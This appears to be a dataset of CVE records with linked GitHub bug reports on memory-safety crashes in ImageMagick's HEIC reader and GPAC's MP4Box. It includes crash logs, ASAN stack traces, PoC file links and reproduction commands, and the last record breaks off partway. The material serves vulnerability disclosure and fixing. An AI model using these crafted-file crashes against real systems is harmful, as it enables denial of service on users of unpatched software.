### Prerequisites - [Y] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description An out-of-bounds read vulnerability exists within the "ReadHEICImageByID()" function (ImageMagick\coders\heic.c) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image. ### Steps to Reproduce (poc archive password= girlelecta): https://drive.google.com/file/d/1N5gcCo7C9yhBGgnBM4AMMngwq95x3uXn/view cmd: magick.exe convert poc.heic new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.17763.132 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\Program Files\ImageMagick-7.0.9-Q16\magick.exe convert C:\Users\test\Desktop\poc.heic c:\a.png ************* Path validation summary ************** Response Time (ms) Location Executable search path is: ModLoad: 000f0000 000fb000 image000f0000 ModLoad: 77e00000 77f99000 ntdll.dll ModLoad: 60ee0000 60f43000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0xD04: page heap enabled with flags 0x3. ModLoad: 77440000 774d8000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 756f0000 758ea000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 7b680000 7b76e000 C:\Program Files\ImageMagick-7.0.9-Q16\MSVCR120.dll ModLoad: 797c0000 7994b000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickCore_.dll ModLoad: 7b5b0000 7b679000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickWand_.dll ModLoad: 6b620000 6b63d000 C:\Program Files\ImageMagick-7.0.9-Q16\VCOMP120.DLL ModLoad: 764c0000 76638000 C:\WINDOWS\System32\USER32.dll ModLoad: 75bd0000 75bec000 C:\WINDOWS\System32\win32u.dll ModLoad: 77210000 77231000 C:\WINDOWS\System32\GDI32.dll ModLoad: 75bf0000 75d4d000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 76320000 7639c000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 75ab0000 75bcf000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 77d80000 77df9000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 774e0000 7759f000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 766a0000 76716000 C:\WINDOWS\System32\sechost.dll ModLoad: 76e10000 76ed1000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 77620000 7767e000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 602c0000 60342000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_freetype_.dll ModLoad: 68750000 68761000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_bzlib_.dll ModLoad: 67a50000 67a94000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_lcms_.dll ModLoad: 63f90000 63fe3000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libxml_.dll ModLoad: 70ca0000 70caf000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_lqr_.dll ModLoad: 68410000 68425000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_zlib_.dll ModLoad: 01530000 01545000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_zlib_.dll ModLoad: 7c720000 7c90a000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_glib_.dll ModLoad: 77800000 77d7a000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 759c0000 759fb000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 76d80000 76e04000 C:\WINDOWS\System32\shcore.dll ModLoad: 76ee0000 77156000 C:\WINDOWS\System32\combase.dll ModLoad: 758f0000 7594f000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 75d50000 76315000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 756d0000 756e7000 C:\WINDOWS\System32\profapi.dll ModLoad: 75680000 756c3000 C:\WINDOWS\System32\powrprof.dll ModLoad: 75650000 7565d000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 773f0000 77434000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 75660000 7566f000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 759a0000 759b3000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 77240000 77337000 C:\WINDOWS\System32\ole32.dll ModLoad: 74d40000 74d72000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 74d80000 74e11000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 767b0000 767b7000 C:\WINDOWS\System32\NSI.dll ModLoad: 76780000 767a6000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 70b50000 70b57000 C:\Program Files\ImageMagick-7.0.9-Q16\modules\coders\IM_MOD_RL_HEIC_.dll ModLoad: 60220000 60273000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libheif_.dll ModLoad: 51f90000 52001000 C:\Program Files\ImageMagick-7.0.9-Q16\MSVCP120.dll ModLoad: 5b7e0000 5b840000 C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_libde265_.dll (d04.1660): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\modules\coders\IM_MOD_RL_HEIC_.dll - eax=058341f0 ebx=00000356 ecx=0010ae10 edx=0000c0c0 esi=04a86c20 edi=00000010 eip=70b5199d esp=001f6390 ebp=076e2220 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 IM_MOD_RL_HEIC_+0x199d: 70b5199d 0fb60c01 movzx ecx,byte ptr [ecx+eax] ds:0023:0593f000=?? 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 00 001f63dc 70b514e1 IM_MOD_RL_HEIC_+0x199d *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\CORE_RL_MagickCore_.dll - 01 001f6430 797f7b05 IM_MOD_RL_HEIC_+0x14e1 02 001f644c 7985935f CORE_RL_MagickCore_!ReadImage+0x505 03 001f6454 798dbfa2 CORE_RL_MagickCore_!RelinquishMagickMemory+0xf 04 001f646c 798dc3be CORE_RL_MagickCore_!GetPathAttributes+0x52 05 001f64b8 798d530e CORE_RL_MagickCore_!IsPathAccessible+0x4e 06 001f64c8 798db98d CORE_RL_MagickCore_!GlobExpression+0x88e 07 001f64cc 798dbaa4 CORE_RL_MagickCore_!ExpandFilenames+0x22d 08 001f64dc 798dbb43 CORE_RL_MagickCore_!ExpandFilenames+0x344 09 001f6524 77e4207b CORE_RL_MagickCore_!ExpandFilenames+0x3e3 0a 001f65c0 77e41976 ntdll!RtlpAllocateHeapInternal+0x6db *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ImageMagick-7.0.9-Q16\MSVCR120.dll - 0b 001f65e0 7b68ed63 ntdll!RtlAllocateHeap+0x36 0c 00000000 00000000 MSVCR120!malloc+0x33 ### System Configuration - ImageMagick: Version: ImageMagick-7.0.9-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
ImageMagick "ReadHEICImageByID()" Out-of-bounds read vulnerability
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1859/comments
6
2020-03-03T19:01:32Z
2020-06-17T12:24:04Z
https://github.com/ImageMagick/ImageMagick/issues/1859
574,875,269
1,859
CVE-2019-20628
2020-03-24T19:15:20.947
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a Use-After-Free vulnerability in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/98b727637e32d1d4824101d8947e2dbd573d4fc8" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1269" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1269
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_uaf_mpegts.c:2183 Command: MP4Box -info $PoC ASAN says: ~~~ ==12341==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000efb0 at pc 0x00000098190d bp 0x7ffd5d0bb3c0 sp 0x7ffd5d0bb3b0 WRITE of size 2 at 0x60300000efb0 thread T0 #0 0x98190c in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2183 #1 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #2 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #3 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #4 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #5 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #6 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #7 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #8 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #9 0x7f58ce76782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) 0x60300000efb0 is located 0 bytes inside of 26-byte region [0x60300000efb0,0x60300000efca) freed by thread T0 here: #0 0x7f58d022d961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x972421 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1730 previously allocated by thread T0 here: #0 0x7f58d022d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x972081 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1705 ~~~ Thanks, Manh Dung
Use After Free (mpegts.c:2183)
https://api.github.com/repos/gpac/gpac/issues/1269/comments
1
2019-07-06T00:10:37Z
2019-07-07T15:59:17Z
https://github.com/gpac/gpac/issues/1269
464,799,448
1,269
CVE-2019-20629
2020-03-24T19:15:21.007
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a heap-based buffer over-read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1264" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1264
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master) due to a heap buffer overflow on function gf_m2ts_process_pmt. PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_hbo_gf_m2ts_process_pmt Command: MP4Box -info $PoC ASAN says: ~~~ ==19178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b000009add at pc 0x0000009816a6 bp 0x7ffd918f74c0 sp 0x7ffd918f74b0 READ of size 1 at 0x60b000009add thread T0 #0 0x9816a5 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2372 #1 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #2 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #3 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #4 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #5 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #6 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #7 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #8 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #9 0x7f2f14c6782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV (heap-buffer-overflow) on gf_m2ts_process_pmt
https://api.github.com/repos/gpac/gpac/issues/1264/comments
1
2019-07-05T22:57:04Z
2019-07-07T15:57:21Z
https://github.com/gpac/gpac/issues/1264
464,791,707
1,264
CVE-2019-20630
2020-03-24T19:15:21.070
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a heap-based buffer over-read in BS_ReadByte (called from gf_bs_read_bit) in utils/bitstream.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1268" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1268
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a buffer overflow on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_hbo_BS_ReadByte Command: MP4Box -info $PoC ASAN says: ~~~ ==27934==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000a236 at pc 0x00000047c2aa bp 0x7ffded5429d0 sp 0x7ffded5429c0 READ of size 1 at 0x60b00000a236 thread T0 #0 0x47c2a9 in BS_ReadByte /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:253 #1 0x47c2a9 in gf_bs_read_bit /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:287 #2 0x47ecc7 in gf_bs_read_double /home/dungnguyen/gueb-testing/gpac-head/src/utils/bitstream.c:444 #3 0x85122d in gf_odf_read_mediatime /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:1471 #4 0x8412bb in gf_odf_parse_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/descriptors.c:159 #5 0x84b027 in gf_odf_read_iod /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:505 #6 0x8412bb in gf_odf_parse_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/descriptors.c:159 #7 0x9808b0 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2179 #8 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #9 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #10 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #11 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #12 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #13 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #14 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #15 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #16 0x7fe2e64fa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
heap-buffer-overflow on BS_ReadByte
https://api.github.com/repos/gpac/gpac/issues/1268/comments
1
2019-07-06T00:10:13Z
2019-07-07T15:59:28Z
https://github.com/gpac/gpac/issues/1268
464,799,415
1,268
CVE-2019-20631
2020-03-24T19:15:21.133
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid pointer dereference in gf_list_count in utils/list.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1270" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1270
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_list_count Command: MP4Box -info $PoC ASAN says: ~~~ ==19963==ERROR: AddressSanitizer: SEGV on unknown address 0x00047fff8001 (pc 0x00000047a43d bp 0x60800000bfa0 sp 0x7ffe5b9765b0 T0) #0 0x47a43c in gf_list_count /home/dungnguyen/gueb-testing/gpac-head/src/utils/list.c:641 #1 0x9809d4 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2185 #2 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #3 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #4 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #5 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #6 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #7 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #8 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #9 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #10 0x7ff2747fe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV on unknown address on gf_list_count
https://api.github.com/repos/gpac/gpac/issues/1270/comments
1
2019-07-06T00:11:01Z
2019-07-07T16:00:40Z
https://github.com/gpac/gpac/issues/1270
464,799,484
1,270
CVE-2019-20632
2020-03-24T19:15:21.180
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid pointer dereference in gf_odf_delete_descriptor in odf/desc_private.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1271" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1271
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_odf_delete_descriptor Command: MP4Box -diso $PoC ASAN says: ~~~ ==26490==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000ff00 (pc 0x000000c3ef6d bp 0x60800000bfa0 sp 0x7fffe837bf90 T0) #0 0xc3ef6c in gf_odf_delete_descriptor /home/dungnguyen/gueb-testing/gpac-head/src/odf/desc_private.c:164 #1 0x848f20 in gf_odf_del_esd /home/dungnguyen/gueb-testing/gpac-head/src/odf/odf_code.c:156 #2 0x980a2e in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2186 #3 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #4 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #5 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #6 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #7 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #8 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #9 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #10 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #11 0x7f94de37a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV on unknown addres on gf_odf_delete_descriptor
https://api.github.com/repos/gpac/gpac/issues/1271/comments
1
